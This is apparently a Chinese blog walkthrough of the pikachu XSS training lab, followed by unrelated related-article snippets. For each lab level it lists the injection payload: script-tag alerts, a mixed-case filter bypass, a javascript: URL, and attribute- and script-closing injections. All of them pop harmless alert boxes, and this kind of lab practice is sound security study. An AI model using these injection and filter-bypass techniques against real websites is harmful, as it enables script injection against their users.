pikachu-XSS闯关挑战

ops/2024/10/30 22:44:56/

get

message=<script>alert("123")</script>&submit=submit

post

可以暴力破解账号密码,但由于是XSS练习,点右上角的提示,就可以登陆

直接在输入框中输入

<script>alert("123")</script>

存储型

<script>alert("123")</script>

DOM

随意输入可以看到提示

进入源码找到提示,将标签闭合

' onclick="alert('123')"

xss-x

同样的语句,链接点两次

盲打

在留言板输入,发现没有变化,在提示中看到登陆后台

<script>alert("456")</script>

在后台可以看到弹窗

过滤

输入发现被过滤

大小写混合,成功

<SCriPt>alert("123")</sCrIPt>

html

可以看到源码时链接

输入

javascript:alert(/xss/)

href

输入上一个,点击链接即可

js输出

看到源码是一个script语句,将前面的闭合,再写一个新的弹窗

</script><script>alert("123")</script>

http://www.ppmy.cn/ops/129716.html

相关文章

Date工具类详细汇总-Date日期相关方法

# 1024程序员节 | 征文 # 目录 简介 Date工具类单元测试 Date工具类 简介 本文章是个人总结实际工作中常用到的Date工具类&#xff0c;主要包含Java-jdk8以下版本的Date相关使用方法&#xff0c;可以方便的在工作中灵活的应用&#xff0c;在个人工作期间频繁使用这些时间的格…

ljjh#True

// background.js // 使用 Map 存储拦截的请求数据&#xff0c;键为 interceptionId const interceptedRequests new Map(); // 使用 Map 存储 requestId 到 interceptionId 的映射 const requestIdToInterceptionIdMap new Map(); // 存储已附加调试器的标签页ID const d…

Spring Authorization Server基于Spring Session的前后端分离实现

本章实现的效果 授权码模式下使用前后端分离的登录页面和授权确认页面。设备码模式(Device Flow)下使用前后端分离的登录页面、授权确认页面、用户码(user_code)验证页面和用户码(user_code)验证成功页面。 分析 在一年多以前我出了两篇前后端分离的文章&#xff0c;分别是《S…

像素、分辨率、PPI(像素密度)、帧率的概念

文章目录 前言一、像素1、定义2、像素点也不是越多越好 二、分辨率1、定义 三、PPI(像素密度)1、定义2、计算公式3、视网膜屏幕 四、帧率1、帧 (Frame)2、帧数 (Frames)3、帧率 (Frame Rate)4、FPS (Frames Per Second)5、赫兹 五、其他1、英寸2、为何显示器尺寸以英寸命名 总结…

vue 项目中无 router 文件夹,如何安装路由

两种情况&#xff1a; 第一种&#xff1a;创建项目的时候有勾选 router&#xff0c;但是没有生成 router 文件夹&#xff1b; 解决方法&#xff1a; 首先&#xff0c;查看 package.json 中有没有 router 的依赖&#xff0c;如下图&#xff1a; 自行在 src 目录下添加 router…

HarmonyOS开发5.0 net 启动界面设置

第一步、创建我们界面 第二步&#xff0c; 在EntryAbility中配置启动页面&#xff0c;在entry/src/main/ets/entryability/EntryAbility.ets中配置启动页面 配置如下 至此大功告成

react文档阅读笔记

文章目录 一、基础入门1. 创建声明一个组件2. 使用组件3. JSX标签语法4. 给组件添加样式5.在JSX中使用JS代码6.在JS中使用JSX7.内联样式8.条件渲染9.列表渲染10.事件处理11.更新页面&#xff08;状态记录&#xff09;12.react的hook函数13.组件间的数据共享 二、React哲学1.将U…

高级java每日一道面试题-2024年10月24日-JVM篇-说一下JVM有哪些垃圾回收器?

如果有遗漏,评论区告诉我进行补充 面试官: 说一下JVM有哪些垃圾回收器? 我回答: 1. Serial收集器 特点&#xff1a;Serial收集器是最古老、最稳定的收集器&#xff0c;它使用单个线程进行垃圾收集工作。在进行垃圾回收时&#xff0c;它会暂停所有用户线程&#xff0c;即St…